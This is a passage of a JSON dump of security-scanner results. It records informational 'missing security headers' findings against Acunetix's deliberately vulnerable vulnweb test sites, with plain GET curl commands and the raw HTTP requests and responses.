HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 410, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:02.157Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 411, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:02.298Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 412, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:02.438Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 413, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:02.594Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 414, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:02.731Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 415, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:02.877Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 416, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:03.015Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 417, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:03.164Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: 